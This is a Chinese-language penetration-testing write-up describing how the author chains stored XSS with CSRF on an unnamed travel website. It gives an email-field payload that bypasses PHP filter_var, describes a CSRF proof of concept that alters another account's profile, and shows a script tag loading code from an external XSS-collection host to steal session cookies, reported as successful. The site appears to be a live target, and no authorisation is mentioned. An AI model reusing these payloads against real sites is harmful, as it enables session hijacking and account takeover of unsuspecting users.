对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳
0x00 前言
0x01开胃小菜
这里用的是
PHP filter_var()函数,通过指定的过滤器过滤变量。可以测试得出,我们只需要 [email protected] 即可绕过:Payload: **"><svg/onload=confirm(1)>"@qq.com**
成功弹窗反射型xss
0x02 进一步验证CSRF存在性
往常一样,打开bp设置代理。我们注册了一个账号:账号:[email protected]密码:123456这个旅游网并没有对用户注册填写的信息进行验证,所以我们任意注册:
看到师傅写的文章,可以看得出:XSS是存在的,所以我们就不必去复现了,只需要闭合即可。
我去尝试过了,在最左边的个人资料修改处,抓取参数时有参数id产生,我也尝试去删除利用,发现无法会使得程序无法应用。所以我们就只能从右边下手。
这个是我盯紧的目标 我们去插入xss发现可以弹窗,我们再去注册一个账号,使得我们的CSRF可以利用。账号:nanfang1密码:123456注册好后我们开始利用,登回去原先的
nanfang
我们去制作csrf的poc:
我们去登录nanfang1这个账号,然后试试可否成功:
会发现这里成功跳转且修改完成。
0x03两道菜组合炒
首先创建一个xsspt项目:
修改闭合如下:"><script src=https://xsspt.com/xxxxxx></script>//然后插入nanfang1当中制作一个csrf的poc,来看看能否成功:
我们登录
nanfang这个账户试试能否成功。
看样子是成功插入的,我们去xss平台上看看有没有cookie:
成功打到cookie,三分运气七分实力。
